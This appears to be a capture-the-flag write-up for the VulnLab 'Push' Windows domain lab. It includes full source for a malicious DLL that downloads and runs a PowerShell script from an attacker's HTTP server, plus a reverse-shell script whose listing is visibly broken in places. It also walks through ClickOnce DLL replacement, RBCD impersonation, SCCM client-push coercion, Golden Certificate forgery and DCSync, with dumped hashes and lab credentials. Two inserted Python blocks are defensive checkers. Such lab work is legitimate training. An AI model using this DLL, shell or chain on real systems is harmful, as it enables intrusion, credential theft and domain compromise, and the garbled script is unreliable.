vulnlab-push
A hard Windows machine. The chain: obtaining credentials from FTP, using write access to an SMB share to place the configuration and DLL file that abuses a ClickOnce application and gives a shell on MS01, enumerating the domain to find the SCCM agent deployed on the system, coercing authentication through Client Push Installation to gain the sccadmin account (a local admin on the system), and, because MS01 is also the CA server, a Golden Certificate attack to escalate privileges on the domain.
Preparation
Create puck.c on the Kali box. puck.c contains:
#include <windows.h>
#include <stdlib.h>

// Runs when the DLL is loaded: fetches puckshell.txt from the attacker's HTTP
// server and hands it to PowerShell for in-memory execution.
BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
    system("powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://192.168.36.116:9000/puckshell.txt')))");
    return TRUE;
}
Compile the malicious DLL:
puck@kali:~$ x86_64-w64-mingw32-gcc ./puck.c -shared -o puck.dll
puck@kali:~$ file puck.dll
puck.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows
puckshell.txt contains:
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
$address = '192.168.1.136'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = ‘C:\\windows\\system32\\cmd.exe’
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
if ($client.Connected -ne $true) {cleanup}
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
if ($process.ExitCode -ne $null) {cleanup}
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$string = $null}} else {cleanup}}
On the attacker PC run an HTTP listener and a netcat listener:
c:\PENTEST>python3 -m http.server 9000
Serving HTTP on :: port 9000 (http://[::]:9000/) …
::ffff:192.168.36.91 - - [22/Jul/2024 10:49:46] "GET /puckshell.txt HTTP/1.1" 200 -
::ffff:192.168.36.91 - - [22/Jul/2024 10:50:32] "GET /puckshell.txt HTTP/1.1" 200 -
c:\PENTEST>nc64.exe -nlvp 443
connect to [192.168.36.116] from (UNKNOWN) [192.168.36.91] 58868
Microsoft Windows [Version 10.0.22631.3880]
(c) Microsoft Corporation. Alle rechten voorbehouden.
C:\Windows\System32>whoami
Test on the Windows target with:
rundll32.exe C:\Payloads\puck.dll,XYZ
If all tests are successful, we continue to the writeup.
Writeup:
We can log in to FTP anonymously on ms01 and find a hidden file .git-credentials containing a username and password:
https://olivia.wood:DeployTrust07@github.com
To abuse ClickOnce we follow the article (see references): we need to upload our SelfService.dll.deploy, which will download and execute a reverse shell.
More to come ...
With a shell as kelly.hill we find her credentials in her home folder:
evil-winrm --ip ms01.push.vl -u 'kelly.hill' -p 'Sh<redacted>!'
xfreerdp /u:kelly.hill /p:'Sh<redacted>!' /v:ms01.push.vl /cert:ignore /rfx
BloodHound analysis:
bloodhound-python -d push.vl -v --zip -c all -u 'olivia.wood' -p 'DeployTrust07' -ns 10.10.198.149 --dns-tcp
Check the machine account quota:
crackmapexec ldap dc01.push.vl -u "Olivia.Wood" -p "DeployTrust07" -M maq
PORT 445 (SMB)
Using the credentials on MS01, we can enumerate the shares and find wwwroot, the share from which the self-service application is hosted.
Going into Application Files, there are the SelfService files.
Abusing ClickOnce to gain foothold
This share is the ClickOnce application dev share. ClickOnce is an easy deploy-and-execute technique that relies on user interaction; we also saw last-run.txt, which indicates that SelfService is executed after some time by a user.
To abuse ClickOnce, following the article, we place our crafted DLL, which will download and execute our payload on the victim machine, through which we'll gain a shell on the netcat listener.
After a minute we'll see a hit on our Python server and get a reverse shell as kelly.hill on the netcat listener.
From Kelly's desktop folder we also get her password: Sh<redacted>i!
We can now get a shell through: evil-winrm --ip ms01.push.vl -u 'kelly.hill' -p 'Sh<redacted>i!'
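The foothold above works because the share's SelfService.dll.deploy no longer matches the build the application was published with. A defender-side integrity check, added here as an example and not part of the writeup: it parses a ClickOnce application manifest for the SHA-256 each .deploy file must have and compares the share's copies against it. The manifest and file bytes are constructed samples; in practice the manifest should be a known-good copy kept outside the share, since whoever can rewrite the DLL in the share can re-sign the manifest there too.

```python
import base64
import hashlib
import xml.etree.ElementTree as ET

DSIG = "http://www.w3.org/2000/09/xmldsig#"
ASMV2 = "urn:schemas-microsoft-com:asm.v2"

# Constructed sample bytes standing in for SelfService.dll.deploy: the build the
# manifest was generated for, and a replaced copy carrying the same file name.
GOOD_DLL = b"MZ\x90\x00 legitimate SelfService build (constructed sample)"
TAMPERED_DLL = b"MZ\x90\x00 replaced SelfService build (constructed sample)"


def file_digest(data):
    """SHA-256 of the raw file bytes, base64 as ClickOnce stores it (Identity transform)."""
    return base64.b64encode(hashlib.sha256(data).digest()).decode()


# Constructed minimal application manifest in the shape mage / Visual Studio emit.
SAMPLE_MANIFEST = f"""<?xml version="1.0" encoding="utf-8"?>
<asmv1:assembly xmlns:asmv1="urn:schemas-microsoft-com:asm.v1"
    xmlns="{ASMV2}" xmlns:dsig="{DSIG}" manifestVersion="1.0">
  <dependency>
    <dependentAssembly dependencyType="install" codebase="SelfService.dll" size="{len(GOOD_DLL)}">
      <assemblyIdentity name="SelfService" version="1.0.0.0" />
      <hash>
        <dsig:Transforms>
          <dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity" />
        </dsig:Transforms>
        <dsig:DigestMethod Algorithm="{DSIG}sha256" />
        <dsig:DigestValue>{file_digest(GOOD_DLL)}</dsig:DigestValue>
      </hash>
    </dependentAssembly>
  </dependency>
</asmv1:assembly>
"""


def expected_digests(manifest_xml):
    """Map each codebase named in the manifest to the base64 SHA-256 it declares."""
    root = ET.fromstring(manifest_xml)
    expected = {}
    for dep in root.iter(f"{{{ASMV2}}}dependentAssembly"):
        value = dep.find(f"{{{ASMV2}}}hash/{{{DSIG}}}DigestValue")
        if dep.get("codebase") and value is not None:
            expected[dep.get("codebase")] = value.text.strip()
    return expected


def verify_deploy_files(manifest_xml, files):
    """files maps codebase -> bytes read from the share (ClickOnce's '.deploy' suffix
    stripped). Returns codebase -> True when the share's copy still matches the
    known-good manifest, False when it was replaced or is missing."""
    return {name: file_digest(files.get(name, b"")) == digest
            for name, digest in expected_digests(manifest_xml).items()}
```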
SCCM Coercion
With SharpSCCM we can coerce authentication via Client Push Installation: the account running SCCM client push, which has local admin privileges on the system, authenticates to our host, and we capture its NTLMv2 challenge-response with Responder.
SharpSCCM.exe invoke client-push -t 10.8.2.138
RBCD abuse
From BloodHound we see that kelly.hill has First Degree Object Control over MS01: AllExtendedRights and WriteAccountRestrictions.
This means we can read all properties on MS01 and, with WriteAccountRestrictions, edit msDS-AllowedToActOnBehalfOfOtherIdentity to perform RBCD (Resource-Based Constrained Delegation).
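The attribute written here is a binary security descriptor, so auditing which accounts may delegate to a host means decoding it. Added example, not part of the writeup: a stand-alone parser that lists the SIDs granted by ACCESS_ALLOWED ACEs in the DACL of an msDS-AllowedToActOnBehalfOfOtherIdentity value, plus an encoder that only builds a constructed sample value to run against. In practice the bytes come from an LDAP read of the computer object; the SID used is the puckie$ SID shown later in the writeup.

```python
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000


def _pack_sid(sid):
    """Encode 'S-1-5-21-...' into binary: revision, sub-authority count,
    6-byte big-endian identifier authority, little-endian sub-authorities."""
    parts = [int(p) for p in sid.split("-")[1:]]
    rev, auth, subs = parts[0], parts[1], parts[2:]
    return (struct.pack("<BB", rev, len(subs)) + auth.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def _unpack_sid(buf, off):
    rev, count = struct.unpack_from("<BB", buf, off)
    auth = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, auth) + "".join("-%d" % s for s in subs)


def build_sample_descriptor(sids):
    """Constructed sample only: a self-relative SD whose DACL holds one
    ACCESS_ALLOWED ACE (mask 0xF01FF) per SID, the shape an RBCD write produces."""
    aces = b""
    for sid in sids:
        body = struct.pack("<I", 0xF01FF) + _pack_sid(sid)
        aces += struct.pack("<BBH", ACCESS_ALLOWED_ACE_TYPE, 0, 4 + len(body)) + body
    dacl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(sids), 0) + aces  # ACL_REVISION_DS
    # SD header (20 bytes): revision, sbz1, control, owner/group/sacl/dacl offsets
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, 0, 0, 0, 20)
    return header + dacl


def allowed_to_act(sd):
    """SIDs allowed to act on behalf of other identities for this object;
    [] when the descriptor carries no DACL."""
    rev, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    off, sids = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(_unpack_sid(sd, off + 8))  # skip 4-byte ACE header + 4-byte mask
        off += ace_size
    return sids
```

An unexpected machine account in this list (here a freshly added puckie$) is the artifact to alert on; the attribute should be empty on most computer objects.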
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-addcomputer -method LDAPS -computer-name 'puckie' -computer-pass 'Summer2024!' -dc-host dc01.push.vl -domain-netbios push.vl 'push.vl/kelly.hill:Sh<redacted>i!'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Successfully added machine account puckie$ with password Summer2024!.
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-rbcd -delegate-from 'puckie$' -delegate-to 'MS01$' -action 'write' 'push.vl/kelly.hill:Sh<redacted>i!'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Accounts allowed to act on behalf of other identity:
[*] Delegation rights modified successfully!
[*] puckie$ can now impersonate users on MS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] puckie$ (S-1-5-21-1451457175-172047642-1427519037-3603)
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-getST -spn 'cifs/ms01.push.vl' -impersonate 'administrator' 'push.vl/puckie$:Summer2024!'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Impersonating administrator
[*] Saving ticket in administrator@cifs_ms01.push.vl@PUSH.VL.ccache
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ export KRB5CCNAME=administrator@cifs_ms01.push.vl@PUSH.VL.ccache
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-secretsdump -k ms01.push.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8<redacted>61:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
[*] Dumping cached domain logon information (domain/username:hash)
PUSH.VL/Administrator:$DCC2$10240#Administrator#33<redacted>09: (2023-08-31 18:27:31)
PUSH.VL/Kelly.Hill:$DCC2$10240#Kelly.Hill#b0<redacted>29: (2023-09-02 11:17:04)
PUSH.VL/sccadmin:$DCC2$10240#sccadmin#0c<redacted>5c: (2023-08-31 10:26:08)
Now that we have the local Administrator hash of ms01, we can pass the hash with evil-winrm:
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ evil-winrm --ip ms01.push.vl -u 'Administrator' -H 'd8<redacted>61'
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\kelly.hill\documents> dir
Directory: C:\Users\kelly.hill\documents
Mode LastWriteTime Length Name
-a—- 7/25/2024 7:39 AM 1125376 SharpSCCM.exe
*Evil-WinRM* PS C:\Users\kelly.hill\documents> .\SharpSCCM.exe local site-info
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Connecting to \\127.0.0.1\root\CCM
[+] Executing WQL query: SELECT Name,CurrentManagementPoint FROM SMS_Authority
CurrentManagementPoint: DC01.push.vl
[+] Completed execution in 00:00:00.2090991
*Evil-WinRM* PS C:\Users\kelly.hill\documents>
┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter]
└─$ python3 sccmhunter.py find -u 'sccadmin' -p '7u<redacted>JM' -dc-ip 10.10.188.181 -d push.vl -ldaps
SCCMHunter v1.0.5 by @garrfoster
[10:15:22] INFO [*] Checking for System Management Container.
[10:15:22] INFO [+] Found System Management Container. Parsing DACL.
[10:15:22] INFO [-] System Management Container not found.
[10:15:22] INFO [*] Searching LDAP for anything containing the strings 'SCCM' or 'MECM'
[10:15:23] INFO [-] No results found.
┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter]
└─$ python3 sccmhunter.py smb -u 'sccadmin' -p '7u<redacted>JM' -dc-ip 10.10.188.181 -d push.vl -ldaps
SCCMHunter v1.0.5 by @garrfoster
[10:17:30] INFO [-] No SiteServers found in database.
[10:17:30] INFO [-] No Management Points found in database.
[10:17:30] INFO [-] No computers found in database.
I could not solve the sccadmin exploit, but with the command below it gives the hash in Responder:
PS C:\Users\kelly.hill\Documents> .\SharpSCCM.exe invoke client-push -t 10.8.2.138 -mp DC01.push.vl -sc HQ0
.\SharpSCCM.exe invoke client-push -t 10.8.2.138 -mp DC01.push.vl -sc HQ0
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Created “ConfigMgr Client Messaging” certificate in memory for device registration and signing/encrypting subsequent messages
[+] Reusable Base64-encoded certificate:
308209D20201033082098E06092A864886F70D010701A082097F0482097B308209773082059006092A864886F70D010701A00207D0
[+] Discovering local properties for client registration request
[+] Modifying client registration request properties:
[+] Sending HTTP registration request to DC01.push.vl:80
[+] Received unique SMS client GUID for new device:
GUID:7D070746-617E-4763-9835-F7811A6BED54
[+] Discovering local properties for DDR inventory report
[+] Modifying DDR and inventory report properties
[+] Discovered PlatformID: Microsoft Windows NT Advanced Server 10.0
[+] Modified PlatformID: Microsoft Windows NT Workstation 2010.0
[+] Sending DDR from GUID:7D070746-617E-4763-9835-F7811A6BED54 to MP_DdrEndpoint endpoint on DC01.push.vl:HQ0 and requesting client installation on 10.8.0.233
[+] Completed execution in 00:00:06.9340974
Escalating Privileges through Golden Certificate
We now have the password of user sccadmin, but sccadmin doesn't have any ACLs, as we saw in BloodHound. The only thing left here is to enumerate the MS01 CA (Certificate Authority) server.
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ crackmapexec smb dc01.push.vl -u "sccadmin" -p "7u<redacted>JM"
SMB DC01.push.vl 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:push.vl) (signing:True) (SMBv1:False)
SMB DC01.push.vl 445 DC01 [+] push.vl\sccadmin:7u<redacted>JM
A Golden Certificate attack with certipy-ad and PassTheCert is possible because we have SYSTEM access to ms01, which is the CA.
Admin access on the CA server means we can extract the CA certificate and private key, and with them forge a certificate for the domain admin, from which we can obtain the NT hash or a TGT of the domain admin. This is known as the Golden Certificate attack.
Using certipy we can take a backup of the CA certificate and private key:
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad ca -u sccadmin -p '7u<redacted>JM' -target-ip MS01.push.vl -backup
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Got certificate and private key
[*] Saved certificate and private key to 'CA.pfx'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad forge -ca-pfx CA.pfx -upn administrator@push.vl -subject 'CN=Administrator,CN=Users,DC=PUSH,DC=VL'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved forged certificate and private key to 'administrator_forged.pfx'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad cert -pfx administrator_forged.pfx -nokey -out administrator.crt
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Writing certificate and to 'administrator.crt'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad cert -pfx administrator_forged.pfx -nocert -out administrator.key
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Writing private key to 'administrator.key'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ python3 passthecert.py -action modify_user -crt administrator.crt -key administrator.key -target kelly.hill -elevate -domain push.vl -dc-host dc01.push.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Granted user 'kelly.hill' DCSYNC rights!
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-secretsdump kelly.hill@DC01.push.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password: Shi<redacted>i!
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0d<redacted>0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d9fd5a3d1406ca03668fcd04a0b4eb09:::
push.vl\svcsql:1104:aad3b435b51404eeaad3b435b51404ee:19<redacted>85:::
That was fun 🙂
References used
- sccm
- PassTheCert
- sharpcollection